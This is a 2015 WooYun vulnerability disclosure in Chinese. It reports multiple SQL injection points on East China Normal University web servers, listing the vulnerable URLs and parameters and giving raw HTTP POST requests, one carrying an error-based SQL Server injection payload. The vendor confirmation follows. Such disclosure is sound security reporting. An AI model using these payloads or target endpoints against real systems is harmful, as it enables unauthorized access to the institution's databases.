当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153216

漏洞标题:华东师范大学多处sql注入漏洞

相关厂商:华东师范大学

漏洞作者: 路人甲

提交时间:2015-11-10 11:08

修复时间:2015-12-26 09:50

公开时间:2015-12-26 09:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-10: 细节已通知厂商并且等待厂商处理中
2015-11-11: 厂商已经确认,细节仅向厂商公开
2015-11-21: 细节向核心白帽子及相关领域专家公开
2015-12-01: 细节向普通白帽子公开
2015-12-11: 细节向实习白帽子公开
2015-12-26: 细节向公众公开

简要描述:

详细说明:

1.http://imcs.ecnu.edu.cn/MAIN/CompVisualizeBig.asp?id=12

11.png


2.

POST /jwk_yygltj/EN/article/searchArticleResult.do HTTP/1.1
Content-Length: 273
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=2AC00FA313677EFC431EB69F6F684EBD; JSESSIONID=E0DBF01694F3A3112638AC47785B4278
Host: aps.ecnu.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Submit2=Search&rad_px=kanchurq%20desc%2ccast(qishiyema%20as%20int(4))&txt_biaoti=1&txt_doi=1&txt_fenlei='%2bconvert(int,db_name())%2b'&txt_fenleihao=1&txt_guanjianci=1&txt_nian=1&txt_pagesize=10&txt_qi=1&txt_qishiye=1&txt_zhaiyao=1&txt_zhuanti=1&txt_zuozhe=1&txt_zuozhedw=1

22.png

漏洞证明:

3.#1:http://jsjy1.dec.ecnu.edu.cn/project/mylog/mylog.asp?fandid=22&Pageno=1 注入点fandid参数
#2:

POST /web/enter.asp?add=1&websortid= HTTP/1.1
Content-Length: 282
Content-Type: application/x-www-form-urlencoded
Cookie: ASPSESSIONIDCQDBCATC=INOLHHBBPDMJHPJBOMMLIMID; ASP.NET_SessionId=4gvyh4z414msya55kxe5tivh; Unionstars.Forum=9A6A31FD0C521D317C52DA9892C753556E9374031DD36984898871B31CA307AE746ED1A707F37642215FD1FC9AFB07DD6753C909E4351E925A828E61CD93ECCEFDB0471D4BDA1D0935EB7E98B9DB8D0AB181B9A0079C4F99A16CE68DEEBAC402EF40F5E9C796AD92C22CE4912622D419D90D34204605C5299098F5E33BA6660D287D58277D999F761E63A71FD782125AFF2E9E97C0B72FC1451E7F76F2472EDF0314E6359FE4574A95C4C6D24FE47C484E6F58F99C35BDFDD3C43F2C1AFAF4AB803E49696AD4B342257F832BFCCBE83F5BB62036AA6EE3AC850AEE94B493255E7A55F38B422F76A127C85DCD
Host: jsjy1.dec.ecnu.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Email=sample%40email.tst&Intro=1&introname=rfuxohpa&Name=rfuxohpa&radiobutton=5&URL=1111&websort=0&workunit=1

注入点:URL参数
#3:http://jsjy1.dec.ecnu.edu.cn/web/sort.asp?ID=74&sortid=1111&websortid=2 注入点:sortid参数
跑第一处:

44.png


修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-11 09:49

厂商回复:

通知二级单位处理。

最新状态:

暂无